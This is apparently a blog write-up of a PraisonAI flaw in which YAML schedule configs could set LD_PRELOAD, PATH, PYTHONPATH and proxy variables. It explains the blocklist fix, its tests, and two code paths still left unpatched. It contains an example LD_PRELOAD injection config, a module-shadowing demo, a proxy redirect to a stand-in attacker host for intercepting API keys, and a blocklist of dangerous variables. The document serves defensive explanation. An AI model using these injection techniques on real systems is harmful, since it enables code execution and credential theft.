
PraisonAI let YAML config files set LD_PRELOAD and nobody checked

PraisonAI's schedule config YAML could set LD_PRELOAD, PATH and 26 other dangerous environment variables with no validation. The fix adds a blocklist and fail-closed validation.

PraisonAI is an open-source framework for orchestrating multi-agent AI workflows. Its --schedule-config CLI flag accepts a YAML file that, among other things, defines environment variables to set before running a deployment. Until PR #1144 was merged on 25 March 2026, that YAML file could set any environment variable it wanted, including LD_PRELOAD, PATH, PYTHONPATH and every proxy variable on the system, with no validation whatsoever.

The data flow was simple: --schedule-config <file> → yaml.safe_load() → file_config["environment"] → os.environ[key] = str(value). Every key in the YAML's environment section was applied directly to the process environment. No blocklist. No allowlist. No type checking on the keys.

What was exploitable

The vulnerable code sat in src/praisonai/praisonai/cli/main.py around line 496:

env_vars = file_config.get('environment', {})
for key, value in env_vars.items():
    os.environ[key] = str(value)

A crafted YAML config could inject any environment variable. The most dangerous vectors fall into three categories.

Dynamic linker injection. Setting LD_PRELOAD=/tmp/evil.so causes the dynamic linker on Linux to load a specified shared library into every subsequently spawned process. This is CWE-427 (Uncontrolled Search Path Element). The same attack works on macOS via DYLD_INSERT_LIBRARIES. A config file containing this:

environment:
  LD_PRELOAD: /tmp/evil.so
  MODEL_NAME: gpt-4

would load the attacker's shared library into every child process PraisonAI spawns, achieving arbitrary code execution before any application code runs.

Module search path hijacking. Setting PYTHONPATH to a directory containing a malicious module means the next import statement loads attacker-controlled code. Setting PATH redirects which binaries get executed by subprocess calls. Both are CWE-426 (Untrusted Search Path).
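The PYTHONPATH vector can be demonstrated end to end with the standard library alone. Here the shadowing json.py and its print payload are harmless stand-ins for attacker code:

```python
import os
import subprocess
import sys
import tempfile

# A directory placed on PYTHONPATH is searched before the standard
# library, so a file named after a common module shadows it in every
# child Python process. The "payload" here is just a print statement.
with tempfile.TemporaryDirectory() as d:
    with open(os.path.join(d, "json.py"), "w") as f:
        f.write("print('attacker module imported')\n")
    env = dict(os.environ, PYTHONPATH=d)
    result = subprocess.run(
        [sys.executable, "-c", "import json"],
        env=env, capture_output=True, text=True,
    )
    print(result.stdout.strip())  # the shadowing module ran, not stdlib json
```

The import statement never changed; only the environment did, which is exactly why untrusted control over PYTHONPATH is code execution.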

Traffic interception. Setting HTTP_PROXY, HTTPS_PROXY or ALL_PROXY redirects all outbound HTTP traffic through an attacker-controlled proxy. For an AI agent framework that routinely sends API keys to LLM providers, this is a direct route to credential theft.
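A quick stdlib check shows why this works: Python's own HTTP machinery resolves proxies straight out of the process environment (the attacker address below is made up):

```python
import os
import urllib.request

# Most Python HTTP clients (urllib, requests, httpx) resolve proxies
# from the process environment at request time, so an injected variable
# takes effect for every subsequent outbound call.
os.environ["HTTPS_PROXY"] = "http://attacker.example:8080"  # hypothetical
proxies = urllib.request.getproxies()
print(proxies.get("https"))  # -> http://attacker.example:8080
```

Every API request the agent makes afterwards, credentials included, would transit the attacker's proxy.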

In practical terms this is a medium-severity issue. The user must explicitly run praisonai --deploy --schedule-config malicious.yaml, which is a local CLI action. There is no network attack surface: the --schedule-config flag is not reachable via any API or web endpoint. An attacker who can trick a user into running a malicious config file could equally trick them into running LD_PRELOAD=/evil.so praisonai directly. The value of the fix is defence in depth: config files are shared, committed to repositories and copied between systems in ways that command-line arguments are not.

How the fix works

The fix introduces a _BLOCKED_ENV_KEYS frozenset containing 28 dangerous variable names across four categories (excerpted below):

_BLOCKED_ENV_KEYS = frozenset({
    # Dynamic linker injection
    "LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT",
    "DYLD_INSERT_LIBRARIES", "DYLD_LIBRARY_PATH", "DYLD_FRAMEWORK_PATH",
    "DYLD_FALLBACK_LIBRARY_PATH",
    # Executable / module search paths
    "PATH",
    "PYTHONPATH", "PYTHONHOME", "PYTHONSTARTUP",
    "NODE_PATH", "NODE_OPTIONS",
    "RUBYLIB", "PERL5LIB", "PERL5OPT",
    "CLASSPATH",
    # Proxy / redirect
    "HTTP_PROXY", "HTTPS_PROXY", "ALL_PROXY",
    # Misc dangerous
    "BASH_ENV", "ENV", "CDPATH",
    "PROMPT_COMMAND", "SHLVL",
})

A _validate_env_key() function rejects non-string keys with a clear error (YAML can produce integer or null keys), then matches the key case-insensitively against this set:

def _validate_env_key(key) -> None:
    if not isinstance(key, str):
        raise ValueError(
            f"Environment variable key must be a string, got {type(key).__name__}: {key!r}"
        )
    if key.upper() in _BLOCKED_ENV_KEYS_UPPER:
        raise ValueError(
            f"Setting environment variable '{key}' is not allowed in schedule "
            f"config files because it can be used to execute arbitrary code."
        )

The critical design choice is the fail-closed validation pattern. The patched code validates all keys into a temporary dictionary before applying any of them to os.environ:

env_vars = file_config.get('environment', {})
if not isinstance(env_vars, dict):
    raise ValueError("'environment' must be a mapping of KEY: value pairs")
validated_env = {}
for key, value in env_vars.items():
    _validate_env_key(key)
    validated_env[key] = str(value)
os.environ.update(validated_env)

This matters. CodeRabbit's automated review caught that the original fix attempt applied environment variables one at a time, meaning earlier safe keys would be set before a later blocked key triggered a ValueError. The fail-closed pattern ensures that if any key in the configuration is dangerous, no keys are applied. Partial mutation of the process environment is worse than no mutation at all: it leaves the system in an inconsistent state where some config was applied and some was not.
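The difference is easy to demonstrate with a stand-in validator (abridged blocklist, hypothetical helper name):

```python
import os

_BLOCKED = frozenset({"LD_PRELOAD", "PATH"})  # abridged stand-in

def apply_env_fail_closed(env_vars: dict) -> None:
    # Validate every key into a staging dict first; os.environ is only
    # touched after the entire config has passed.
    validated = {}
    for key, value in env_vars.items():
        if not isinstance(key, str) or key.upper() in _BLOCKED:
            raise ValueError(f"blocked or invalid key: {key!r}")
        validated[key] = str(value)
    os.environ.update(validated)

config = {"MODEL_NAME": "gpt-4", "LD_PRELOAD": "/tmp/evil.so"}
try:
    apply_env_fail_closed(config)
except ValueError:
    pass
# The safe key that preceded the blocked one was never applied either.
print("MODEL_NAME" in os.environ)
```

Had the loop written to os.environ directly, MODEL_NAME would already be set when LD_PRELOAD raised, leaving the half-applied state the review flagged.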

What the tests cover

The PR includes four tests in test_cwe78_env_injection.py:

  1. test_dangerous_env_keys_are_blocked: Iterates all 28 blocked keys plus lowercase and mixed-case variants, asserting each raises ValueError.
  2. test_safe_env_keys_are_allowed: Confirms benign keys like MODEL_NAME and MY_API_KEY pass validation.
  3. test_non_string_key_rejected: Feeds integers, None, floats and booleans (all valid YAML key types) and asserts clear rejection.
  4. test_vulnerability_scenario_ld_preload: Parses a full YAML config containing LD_PRELOAD: /tmp/evil.so alongside a safe MODEL_NAME key, runs the validate-all-then-apply pattern and confirms LD_PRELOAD was never set in os.environ.

The Qodo automated review flagged a genuine bug in the test fixture: the _clean_env fixture used os.environ.pop() in teardown, which would permanently delete pre-existing environment variables (including PATH) for the rest of the pytest session. This was fixed in a follow-up commit by snapshotting and restoring original values.
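The corrected teardown idea, sketched here as a plain context manager rather than the actual pytest fixture:

```python
import os
from contextlib import contextmanager

@contextmanager
def preserve_env(*keys):
    # Snapshot current values, including absence, so teardown restores
    # them instead of unconditionally popping -- the flagged fixture's
    # pop() deleted pre-existing variables such as PATH for good.
    saved = {k: os.environ.get(k) for k in keys}
    try:
        yield
    finally:
        for k, v in saved.items():
            if v is None:
                os.environ.pop(k, None)
            else:
                os.environ[k] = v

os.environ["DEMO_VAR"] = "original"
with preserve_env("DEMO_VAR"):
    os.environ["DEMO_VAR"] = "mutated by test"
print(os.environ["DEMO_VAR"])  # -> original
```

pytest's built-in monkeypatch fixture implements the same snapshot-and-restore discipline, which is one reason to prefer it over hand-rolled environment fixtures.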

The blocklist tradeoff

A blocklist is inherently incomplete, and the PR's own "disprove" analysis acknowledges this honestly. Variables not on the list but still dangerous in specific contexts include:

  • GCONV_PATH: loads arbitrary shared libraries via glibc's charset conversion mechanism
  • GIT_SSH_COMMAND: executes arbitrary commands when git operations run
  • OPENSSL_CONF: loads a crafted OpenSSL configuration that can trigger engine loading
  • HOME: redirects dotfile loading for every tool the process invokes
  • IFS: alters shell word splitting, potentially changing how arguments are parsed

The alternative is an allowlist: only permit environment variable names matching a known-good pattern like provider API keys. The PR discussion notes that this approach was considered but rejected because PraisonAI supports a wide range of LLM providers, each with their own environment variable conventions. An allowlist would break whenever a new provider is added. The blocklist trades completeness for compatibility.
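To make the tradeoff concrete, here is a hypothetical allowlist (the pattern is invented for illustration, not taken from the PR). It blocks LD_PRELOAD, but it also rejects legitimate keys that don't fit the pattern:

```python
import re

# Hypothetical allowlist: only names that look like provider credentials
# or endpoints are permitted.
_ALLOWED = re.compile(r"^[A-Z0-9_]+_(API_KEY|BASE_URL|TOKEN)$")

def is_allowed(key: str) -> bool:
    return _ALLOWED.fullmatch(key) is not None

print(is_allowed("OPENAI_API_KEY"))  # True
print(is_allowed("LD_PRELOAD"))      # False: blocked, as intended
print(is_allowed("MODEL_NAME"))      # False: a legitimate key breaks too
```

Every new provider convention that falls outside the pattern becomes a support ticket, which is the compatibility cost the maintainers weighed against the blocklist's incompleteness.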

This is a reasonable engineering decision for a local CLI tool where the user explicitly provides the config file. It would not be acceptable for a server-side system processing untrusted input. The threat model matters.

The unpatched twin

Maintainer MervinPraison's review comment flagged something the PR did not address: a second identical vulnerable pattern at line 457 in the same file, inside a different code path:

env_vars = file_config.get('environment', {})
for key, value in env_vars.items():
    os.environ[key] = str(value)

Additionally, bots_cli.py at line 136 applies os.environ[key] = value when parsing .env files, with no blocklist at all. These are the same vulnerability in different clothes. Fixing one code path but not the others is a common pattern in security remediation: the specific instance gets patched while structurally identical instances elsewhere in the codebase remain.

This is not a criticism of the PR. Scope boundaries exist for good reasons and incremental fixes land faster than whole-codebase refactors. But it does mean the vulnerability class is still present in PraisonAI if those other paths are reachable under similar conditions.

A recurring pattern in AI agent frameworks

This is the fourth case study on this blog where an AI agent framework ships an environment-handling vulnerability that would have been caught by standard practice in other contexts. The gptme audit found API keys passed as Docker CLI arguments visible to every user on the system. The Hugging Face skills audit found SQL injection vectors in a database manager that parameterised queries would have prevented. The Hermes Agent review found path traversal through unsanitised worktree include entries.

The common thread is not incompetence. PraisonAI uses yaml.safe_load() rather than yaml.load(), which means someone thought about YAML deserialisation attacks. The environment variable path simply was not part of the threat model. AI agent frameworks tend to start as personal developer tools where the user is the only trust boundary. When those tools grow to support deployment configurations, scheduled execution and multi-user workflows, the trust model changes but the code does not always change with it.

yaml.safe_load() prevents the YAML parser from constructing arbitrary Python objects. It does nothing to prevent the application from taking the parsed data and doing dangerous things with it. The gap between "safe parsing" and "safe handling" is where these vulnerabilities live.
